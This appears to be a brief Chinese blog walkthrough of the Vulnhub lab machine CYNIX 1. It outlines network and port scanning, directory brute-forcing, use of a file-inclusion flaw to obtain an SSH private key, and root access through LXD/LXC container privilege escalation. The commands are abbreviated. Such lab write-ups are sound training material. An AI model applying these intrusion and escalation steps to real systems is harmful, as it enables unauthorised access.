前言
- Vulnhub刷题简单记录
CYNIX 1
描述
- 级别:中-难
- 用户标志:user.txt
- 根标志:root.txt
- 描述:这是一个 Boot2Root 机器。该机器与 VirtualBox 兼容,但也可以在 VMWare 中使用(未测试但应该可以使用)。DHCP 将自动分配 IP。您必须找到并读取分别存在于 user.txt 和 root.txt 中的两个标志(user 和 root)。尽情享受吧!
CYNIX 1
1、可以用两种方法确认靶场的存在,扫ip
1 | netdiscover -i eth0 -r 192.168.1.0/24 |
2、扫目标端口开发情况
1 | nmap -p- -T5 192.168.56.101 #全端口扫描 |
3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况
1 | gobuster dir -u http://192.168.56.101/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 10 |
4、通过找到文件包含漏洞获取私钥,就可以直接登录了
1 | -----BEGIN RSA PRIVATE KEY----- |
1 | chmod 600 id_rsa |
5、利用lxd提权
1 | git clone https://github.com/saghul/lxd-alpine-builder.git |
6、用lxc提权
1 | lxc image import ./alpine-v3.14-x86_64-20210923_0451.tar.gz --alias mygylq # 别名为mygylq |
总结
就是将整个机子里面的目录,在复制进我们创建的容器中,就可以看到root的用户的文件了。
我的个人博客
孤桜懶契:http://gylq.gitee.io